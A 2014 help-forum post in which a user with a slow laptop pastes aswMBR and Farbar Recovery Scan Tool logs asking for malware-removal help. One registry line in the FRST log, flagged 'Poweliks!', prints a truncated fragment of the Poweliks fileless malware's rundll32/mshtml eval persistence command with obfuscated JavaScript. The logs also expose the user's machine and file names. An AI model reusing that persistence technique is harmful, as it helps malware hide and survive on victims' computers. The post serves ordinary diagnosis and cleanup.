Slow laptop, Spybot and Malwarebytes have not found the issue

**gludog** · 2014-12-17, 20:57

Hi, noticed the sudden slow performance on my laptop at the end of last week. I have tried Malwarebytes which has not found the threat. I remembered using Spybot years ago and have run numerous scans. The Spybot scans find items but the issue still starts again. Typically the laptop is fine for 20-30 minutes then gets to a very slow speed regardless of what I am working on (email, excel or internet).

Thanks

aswMBR version 1.0.1.2252 Copyright(c) 2014 AVAST Software
Run date: 2014-12-17 10:39:19
-----------------------------
10:39:19.607 OS Version: Windows x64 6.1.7601 Service Pack 1
10:39:19.607 Number of processors: 4 586 0x2A07
10:39:19.607 ComputerName: GLUSKID-LT UserName: gluskid
10:39:25.141 Initialize success
10:39:25.416 VM: initialized successfully
10:39:25.418 VM: Intel CPU supported
10:40:38.578 VM: disk I/O iaStorA.sys
10:50:08.187 Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\00000062
10:50:08.208 Disk 0 Vendor: WDC_____ 01.0 Size: 305245MB BusType: 11
10:50:08.304 Disk 0 MBR read successfully
10:50:08.307 Disk 0 MBR scan
10:50:08.309 Disk 0 Windows 7 default MBR code
10:50:08.323 Disk 0 Partition 1 80 (A) 07 HPFS/NTFS NTFS 499 MB offset 2048
10:50:08.332 Disk 0 default boot code
10:50:08.335 Disk 0 Partition 2 00 07 HPFS/NTFS NTFS 304744 MB offset 1024000
10:50:08.366 Disk 0 scanning C:\windows\system32\drivers
10:50:14.118 Service scanning
10:50:37.264 Modules scanning
10:50:37.275 Disk 0 trace - called modules:
10:50:37.324 ntoskrnl.exe CLASSPNP.SYS disk.sys stdcfltn.sys iaStorF.sys ACPI.sys storport.sys hal.dll iaStorA.sys
10:50:37.350 1 nt!IofCallDriver -> \Device\Harddisk0\DR0[0xfffffa8004725060]
10:50:37.350 3 CLASSPNP.SYS[fffff88000e5743f] -> nt!IofCallDriver -> [0xfffffa80045ce8c0]
10:50:37.360 5 stdcfltn.sys[fffff88001de4d12] -> nt!IofCallDriver -> [0xfffffa80045cec50]
10:50:37.380 7 iaStorF.sys[fffff88001df5f84] -> nt!IofCallDriver -> [0xfffffa80045bae40]
10:50:37.390 9 ACPI.sys[fffff88000f6e7a1] -> nt!IofCallDriver -> \Device\00000062[0xfffffa80046939c0]
10:50:37.410 Disk 0 statistics 91937/0/0 @ 10.49 MB/s
10:50:37.420 Scan finished successfully
10:52:04.316 Disk 0 MBR has been saved successfully to "C:\Users\gluskid\Desktop\MBR.dat"
10:52:04.316 The log file has been saved successfully to "C:\Users\gluskid\Desktop\aswMBR.txt"

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 14-12-2014 01
Ran by gluskid (administrator) on GLUSKID-LT on 17-12-2014 10:29:18
Running from C:\Users\gluskid\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2PB313KY
Loaded Profiles: gluskid & Administrator (Available profiles: gluskid & Administrator)
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic...ery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Sophos Limited) C:\Program Files (x86)\Sophos\Sophos Anti-Virus\SavService.exe
(Cisco Systems, Inc.) C:\Program Files (x86)\Cisco\Cisco AnyConnect VPN Client\vpnagent.exe
(Sophos Limited) C:\Program Files (x86)\Sophos\Sophos Client Firewall\SCFManager.exe
(Sophos Limited) C:\Program Files (x86)\Sophos\Sophos Client Firewall\SCFService.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
() C:\Program Files (x86)\ManageEngine\AssetExplorer\bin\agentmonitor.exe
() C:\Program Files (x86)\ManageEngine\AssetExplorer\bin\aeagent.exe
() C:\Program Files (x86)\DesktopCentral_Agent\bin\dcagentservice.exe
() C:\Program Files (x86)\DesktopCentral_Agent\bin\dcondemand.exe
() C:\Program Files (x86)\DesktopCentral_Agent\bin\dcswmeter.exe
(Sophos Limited) C:\Program Files (x86)\Sophos\Sophos Anti-Virus\SAVAdminService.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Sophos Limited) C:\Program Files (x86)\Sophos\Remote Management System\ManagementAgentNT.exe
(Sophos Limited) C:\Program Files (x86)\Sophos\AutoUpdate\ALsvc.exe
(Sophos Limited) C:\Program Files (x86)\Sophos\Remote Management System\RouterNT.exe
(Sophos Limited) C:\Program Files (x86)\Sophos\Sophos Anti-Virus\Web Control\swc_service.exe
(Sophos Limited) C:\Program Files (x86)\Sophos\Sophos Anti-Virus\Web Intelligence\swi_service.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Greenshot) C:\Program Files\Greenshot\Greenshot.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
() C:\Program Files (x86)\DesktopCentral_Agent\bin\dcagenttrayicon.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(WinZip Computing, S.L.) C:\Program Files (x86)\WinZip\WZQKPICK.EXE
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Integrated Clock Controller Service\ICCProxy.exe
(Geek Software GmbH) C:\Program Files (x86)\PDF24\pdf24.exe
(Sophos Limited) C:\Program Files (x86)\Sophos\AutoUpdate\ALMon.exe
(Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\acrotray.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWelcome.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\NAPSTAT.EXE
(Microsoft Corporation) C:\Windows\SysWOW64\fixmapi.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmmon32.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Greenshot] => C:\Program Files\Greenshot\Greenshot.exe [495616 2013-12-12] (Greenshot)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2014-05-08] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [507776 2014-10-07] (Oracle Corporation)
HKLM-x32\...\Run: [PDFPrint] => C:\Program Files (x86)\PDF24\pdf24.exe [162856 2013-06-10] (Geek Software GmbH)
HKLM-x32\...\Run: [Sophos AutoUpdate Monitor] => C:\Program Files (x86)\Sophos\AutoUpdate\almon.exe [1617704 2014-09-18] (Sophos Limited)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Adobe Acrobat Speed Launcher] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe [36760 2010-10-25] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe [821144 2010-10-25] (Adobe Systems Inc.)
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
Winlogon\Notify\igfxcui: C:\windows\system32\igfxdev.dll (Intel Corporation)
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKU\S-1-5-21-2118340153-1145135853-813105556-21214\...\Policies\Explorer\DisallowRun: [1] mozilla.exe
HKU\S-1-5-21-2118340153-1145135853-813105556-21214\...\Policies\Explorer\DisallowRun: [2] netscape.exe
HKU\S-1-5-21-2118340153-1145135853-813105556-21214\...\Policies\Explorer: [DisallowRun] 1
HKU\S-1-5-21-2118340153-1145135853-813105556-21214\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
AppInit_DLLs: C:\PROGRA~2\Sophos\SOPHOS~1\SOPHOS~2.DLL => C:\Program Files (x86)\Sophos\Sophos Anti-Virus\sophos_detoured_x64.dll [217160 2014-11-03] (Sophos Limited)
AppInit_DLLs-x32: C:\PROGRA~2\Sophos\SOPHOS~1\SOPHOS~1.DLL => C:\Program Files (x86)\Sophos\Sophos Anti-Virus\sophos_detoured.dll [275352 2014-11-03] (Sophos Limited)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ManageEngine Desktop Central Agent.lnk
ShortcutTarget: ManageEngine Desktop Central Agent.lnk -> C:\Program Files (x86)\DesktopCentral_Agent\bin\dcagenttrayicon.exe ()
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\WinZip Quick Pick.lnk
ShortcutTarget: WinZip Quick Pick.lnk -> C:\Program Files (x86)\WinZip\WZQKPICK.EXE (WinZip Computing, S.L.)
BootExecute: autocheck autochk * sdnclean64.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\PE_C_SHIRKR\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-2118340153-1145135853-813105556-21214\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.yahoo.com/
HKU\S-1-5-21-975400410-3068043782-3249626173-500\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
SearchScopes: HKU\PE_C_SHIRKR -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_25\bin\ssv.dll (Oracle Corporation)
BHO: WebEx Productivity Tools -> {90E2BA2E-DD1B-4cde-9134-7A8B86D33CA7} -> C:\Program Files (x86)\WebEx\Productivity Tools\ptonecli64.dll (Cisco WebEx LLC)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_25\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: WebEx Productivity Tools -> {90E2BA2E-DD1B-4cde-9134-7A8B86D33CA7} -> C:\Program Files (x86)\WebEx\Productivity Tools\ptonecli.dll (Cisco WebEx LLC)
BHO-x32: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM - WebEx Productivity Tools - {90E2BA2E-DD1B-4cde-9134-7A8B86D33CA7} - C:\Program Files (x86)\WebEx\Productivity Tools\ptonecli64.dll (Cisco WebEx LLC)
Toolbar: HKLM-x32 - WebEx Productivity Tools - {90E2BA2E-DD1B-4cde-9134-7A8B86D33CA7} - C:\Program Files (x86)\WebEx\Productivity Tools\ptonecli.dll (Cisco WebEx LLC)
Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
DPF: HKLM-x32 {E06E2E99-0AA1-11D4-ABA6-0060082AA75C} https://akamaicdn.webex.com/client/W...x/ieatgpc1.cab
Winsock: Catalog9 01 C:\ProgramData\Sophos\Web Intelligence\swi_ifslsp.dll [126760] (Sophos Limited)
Winsock: Catalog9 02 C:\ProgramData\Sophos\Web Intelligence\swi_ifslsp.dll [126760] (Sophos Limited)
Winsock: Catalog9 03 C:\ProgramData\Sophos\Web Intelligence\swi_ifslsp.dll [126760] (Sophos Limited)
Winsock: Catalog9 04 C:\ProgramData\Sophos\Web Intelligence\swi_ifslsp.dll [126760] (Sophos Limited)
Winsock: Catalog9 05 C:\ProgramData\Sophos\Web Intelligence\swi_ifslsp.dll [126760] (Sophos Limited)
Winsock: Catalog9 06 C:\ProgramData\Sophos\Web Intelligence\swi_ifslsp.dll [126760] (Sophos Limited)
Winsock: Catalog9 07 C:\ProgramData\Sophos\Web Intelligence\swi_ifslsp.dll [126760] (Sophos Limited)
Winsock: Catalog9 08 C:\ProgramData\Sophos\Web Intelligence\swi_ifslsp.dll [126760] (Sophos Limited)
Winsock: Catalog9 19 C:\ProgramData\Sophos\Web Intelligence\swi_ifslsp.dll [126760] (Sophos Limited)
Winsock: Catalog9-x64 01 C:\ProgramData\Sophos\Web Intelligence\swi_ifslsp_64.dll [173864] (Sophos Limited)
Winsock: Catalog9-x64 02 C:\ProgramData\Sophos\Web Intelligence\swi_ifslsp_64.dll [173864] (Sophos Limited)
Winsock: Catalog9-x64 03 C:\ProgramData\Sophos\Web Intelligence\swi_ifslsp_64.dll [173864] (Sophos Limited)
Winsock: Catalog9-x64 04 C:\ProgramData\Sophos\Web Intelligence\swi_ifslsp_64.dll [173864] (Sophos Limited)
Winsock: Catalog9-x64 05 C:\ProgramData\Sophos\Web Intelligence\swi_ifslsp_64.dll [173864] (Sophos Limited)
Winsock: Catalog9-x64 06 C:\ProgramData\Sophos\Web Intelligence\swi_ifslsp_64.dll [173864] (Sophos Limited)
Winsock: Catalog9-x64 07 C:\ProgramData\Sophos\Web Intelligence\swi_ifslsp_64.dll [173864] (Sophos Limited)
Winsock: Catalog9-x64 08 C:\ProgramData\Sophos\Web Intelligence\swi_ifslsp_64.dll [173864] (Sophos Limited)
Winsock: Catalog9-x64 19 C:\ProgramData\Sophos\Web Intelligence\swi_ifslsp_64.dll [173864] (Sophos Limited)
Tcpip\Parameters: [DhcpNameServer] 75.75.76.76 75.75.75.75

FireFox:
========
FF ProfilePath: C:\Users\gluskid\AppData\Roaming\Mozilla\Firefox\Profiles\82heu55g.default
FF Plugin: @adobe.com/FlashPlayer -> C:\windows\system32\Macromed\Flash\NPSWF64_15_0_0_189.dll ()
FF Plugin: @java.com/DTPlugin,version=11.25.2 -> C:\Program Files\Java\jre1.8.0_25\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.25.2 -> C:\Program Files\Java\jre1.8.0_25\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_189.dll ()
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF HKLM-x32\...\Firefox\Extensions: [ocplugin@webex.com] - C:\Program Files (x86)\WebEx\Productivity Tools
FF Extension: ocplugin - C:\Program Files (x86)\WebEx\Productivity Tools [2014-11-03]
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn
FF Extension: Adobe Acrobat - Create PDF - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn [2014-11-03]

Chrome:
=======
CHR Profile: C:\Users\gluskid\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\gluskid\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2014-11-03]
CHR Extension: (Google Docs) - C:\Users\gluskid\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-11-03]
CHR Extension: (Google Drive) - C:\Users\gluskid\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-11-03]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\gluskid\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-11-03]
CHR Extension: (YouTube) - C:\Users\gluskid\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-11-03]
CHR Extension: (Google Search) - C:\Users\gluskid\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-11-03]
CHR Extension: (Google Sheets) - C:\Users\gluskid\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2014-11-03]
CHR Extension: (Google Wallet) - C:\Users\gluskid\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-11-03]
CHR Extension: (Gmail) - C:\Users\gluskid\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-11-03]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 ManageEngine AssetExplorer Agent; C:\Program Files (x86)\ManageEngine\AssetExplorer\bin\agentmonitor.exe [598016 2012-06-28] () [File not signed]
S3 ManageEngine AssetExplorer RemoteControl; C:\Program Files (x86)\ManageEngine\AssetExplorer\\RemoteControl\Service.exe [2166784 2012-06-28] () [File not signed]
R2 ManageEngine Desktop Central - Agent; C:\Program Files (x86)\DesktopCentral_Agent\bin\dcagentservice.exe [556392 2014-05-16] ()
S3 ManageEngine Desktop Central - Remote Control; C:\Program Files (x86)\DesktopCentral_Agent\bin\dcrdservice.exe [613736 2014-05-16] ()
S4 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-11-21] (Malwarebytes Corporation)
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [969016 2014-11-21] (Malwarebytes Corporation)
R2 SAVAdminService; C:\Program Files (x86)\Sophos\Sophos Anti-Virus\SAVAdminService.exe [288552 2014-11-03] (Sophos Limited)
R2 SAVService; C:\Program Files (x86)\Sophos\Sophos Anti-Virus\SavService.exe [208168 2014-11-03] (Sophos Limited)
R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1740760 2014-09-03] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
R2 Sophos Agent; C:\Program Files (x86)\Sophos\Remote Management System\ManagementAgentNT.exe [289856 2014-11-03] (Sophos Limited)
R2 Sophos AutoUpdate Service; C:\Program Files (x86)\Sophos\AutoUpdate\ALsvc.exe [341800 2014-09-18] (Sophos Limited)
R2 Sophos Client Firewall; C:\Program Files (x86)\Sophos\Sophos Client Firewall\SCFService.exe [64808 2014-11-03] (Sophos Limited)
R2 Sophos Client Firewall Manager; C:\Program Files (x86)\Sophos\Sophos Client Firewall\SCFManager.exe [158504 2014-11-03] (Sophos Limited)
R2 Sophos Message Router; C:\Program Files (x86)\Sophos\Remote Management System\RouterNT.exe [818240 2014-11-03] (Sophos Limited)
R2 Sophos Web Control Service; C:\Program Files (x86)\Sophos\Sophos Anti-Virus\Web Control\swc_service.exe [341800 2014-11-03] (Sophos Limited)
R2 swi_service; C:\Program Files (x86)\Sophos\Sophos Anti-Virus\Web Intelligence\swi_service.exe [3262248 2014-11-03] (Sophos Limited)
S2 swi_update_64; C:\ProgramData\Sophos\Web Intelligence\swi_update_64.exe [2065704 2014-11-03] (Sophos Limited)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R0 amdkmpfd; C:\Windows\System32\drivers\amdkmpfd.sys [36096 2014-08-19] (Advanced Micro Devices, Inc.)
R0 iaStorF; C:\Windows\System32\drivers\iaStorF.sys [28008 2014-07-03] (Intel Corporation)
R3 MBAMProtector; C:\windows\system32\drivers\mbam.sys [25816 2014-11-21] (Malwarebytes Corporation)
S3 MBAMSwissArmy; C:\windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-12-17] (Malwarebytes Corporation)
S3 MBAMWebAccessControl; C:\windows\system32\drivers\mwac.sys [63704 2014-11-21] (Malwarebytes Corporation)
R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [118272 2014-08-19] (Intel Corporation)
R1 SAVOnAccess; C:\Windows\System32\DRIVERS\savonaccess.sys [158976 2014-11-03] (Sophos Limited)
R1 scfdriver; C:\windows\system32\Drivers\scfdriver.sys [102688 2014-11-03] (Sophos Limited)
R1 scfndis; C:\Windows\System32\DRIVERS\scfndis.sys [55072 2014-11-03] (Sophos Limited)
S3 sdcfilter; C:\Windows\System32\DRIVERS\sdcfilter.sys [38144 2014-11-03] (Sophos Limited)
S4 SophosBootDriver; C:\Windows\System32\DRIVERS\SophosBootDriver.sys [27904 2014-11-03] (Sophos Limited)
R3 ST_Accel; C:\Windows\System32\DRIVERS\ST_Accel.sys [89312 2014-06-25] (STMicroelectronics)

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-12-17 10:29 - 2014-12-17 10:29 - 00000000 ____D () C:\FRST
2014-12-17 08:51 - 2014-12-17 08:51 - 00003288 ____N () C:\bootsqm.dat
2014-12-17 08:37 - 2014-12-17 08:37 - 00050679 _____ () C:\Users\gluskid\Desktop\Jan Feb 2014 ALG Residuals 14 MY Only.xlsx
2014-12-16 22:36 - 2014-12-16 22:36 - 00000000 ____D () C:\Users\gluskid\AppData\Roaming\Mozilla
2014-12-16 22:36 - 2014-12-16 22:36 - 00000000 ____D () C:\Users\gluskid\AppData\Local\Mozilla
2014-12-16 15:05 - 2014-12-16 15:05 - 00179554 _____ () C:\Users\gluskid\Documents\Copy of 2015MY Market Basket Summary - Retail Incentive Programs - Autodata 1216514.xlsx
2014-12-16 13:42 - 2014-12-16 13:42 - 00000000 ____D () C:\Users\gluskid\Documents\ProcAlyzer Dumps
2014-12-15 15:40 - 2014-12-15 15:40 - 00000000 ____D () C:\windows\System32\Tasks\Safer-Networking
2014-12-15 15:16 - 2014-12-15 15:16 - 00000000 ____D () C:\USB
2014-12-15 14:52 - 2009-06-10 16:00 - 00000824 _____ () C:\windows\system32\Drivers\etc\hosts.20141215-145251.backup
2014-12-15 10:47 - 2014-12-15 10:47 - 00000000 ____D () C:\ProgramData\IsolatedStorage
2014-12-15 10:16 - 2014-12-15 10:16 - 00001829 _____ () C:\Users\gluskid\Documents\bot_data_for_ip_1418656388860_98.243.26.173.csv
2014-12-15 08:10 - 2012-12-15 19:38 - 00333496 _____ (Hewlett-Packard Co.) C:\windows\system32\hpinkstsC511LM.dll
2014-12-15 08:10 - 2012-12-15 19:38 - 00272056 _____ (Hewlett-Packard Co.) C:\windows\system32\hpinkcoiC511.dll
2014-12-15 08:10 - 2012-12-15 18:36 - 02878648 _____ (Hewlett-Packard Co.) C:\windows\system32\hpinkinsC511.exe
2014-12-15 00:02 - 2014-12-15 09:00 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2014-12-15 00:02 - 2014-12-15 08:59 - 00000630 _____ () C:\windows\Tasks\Refresh immunization (Spybot - Search & Destroy).job
2014-12-15 00:02 - 2014-12-15 08:59 - 00000460 _____ () C:\windows\Tasks\Scan the system (Spybot - Search & Destroy).job
2014-12-15 00:02 - 2014-12-15 08:55 - 00000000 ____D () C:\Program Files (x86)\Spybot - Search & Destroy 2
2014-12-15 00:02 - 2014-12-15 00:02 - 00001401 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2014-12-15 00:02 - 2014-12-15 00:02 - 00001389 _____ () C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2014-12-15 00:02 - 2014-12-15 00:02 - 00000656 _____ () C:\windows\Tasks\Check for updates (Spybot - Search & Destroy).job
2014-12-15 00:02 - 2014-12-15 00:02 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2014-12-15 00:02 - 2013-09-20 10:49 - 00021040 _____ (Safer Networking Limited) C:\windows\system32\sdnclean64.exe
2014-12-12 15:28 - 2014-12-17 08:09 - 00129752 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\MBAMSwissArmy.sys
2014-12-12 15:27 - 2014-12-12 15:27 - 00001112 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-12-12 15:27 - 2014-12-12 15:27 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-12-12 15:27 - 2014-12-12 15:27 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-12-12 15:27 - 2014-12-12 15:27 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-12-12 15:27 - 2014-11-21 06:14 - 00093400 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbamchameleon.sys
2014-12-12 15:27 - 2014-11-21 06:14 - 00063704 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mwac.sys
2014-12-12 15:27 - 2014-11-21 06:14 - 00025816 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbam.sys
2014-12-11 09:56 - 2014-12-11 09:56 - 00000000 ____D () C:\Users\gluskid\AppData\Local\Sophos
2014-12-10 15:14 - 2014-12-10 15:15 - 00014197 _____ () C:\Users\gluskid\Desktop\Executive Definitions CHANGES.xlsx
2014-12-09 12:02 - 2014-12-09 12:02 - 00013815 _____ () C:\Users\gluskid\Desktop\Chrysler - Current MSRP File Totals 12 - 15.xlsx
2014-12-02 12:10 - 2014-12-02 12:10 - 00419748 _____ () C:\Users\gluskid\Desktop\December 2014 National Color Chart With Regionals V2.xlsx
2014-11-24 15:38 - 2014-11-24 15:38 - 00000000 ____D () C:\Users\gluskid\AppData\Local\Hewlett-Packard
2014-11-24 15:34 - 2014-11-24 15:34 - 00000000 ____D () C:\Program Files (x86)\Hp
2014-11-22 22:36 - 2014-04-09 12:59 - 05904880 _____ (Intel Corporation) C:\windows\system32\GfxUI.exe
2014-11-22 22:36 - 2014-04-09 12:59 - 00515568 _____ (Intel Corporation) C:\windows\system32\igfxsrvc.exe
2014-11-22 22:36 - 2014-04-09 12:59 - 00442352 _____ (Intel Corporation) C:\windows\system32\igfxpers.exe
2014-11-22 22:36 - 2014-04-09 12:59 - 00399856 _____ (Intel Corporation) C:\windows\system32\hkcmd.exe
2014-11-22 22:36 - 2014-04-09 12:59 - 00279024 _____ (Intel Corporation) C:\windows\SysWOW64\IntelCpHeciSvc.exe
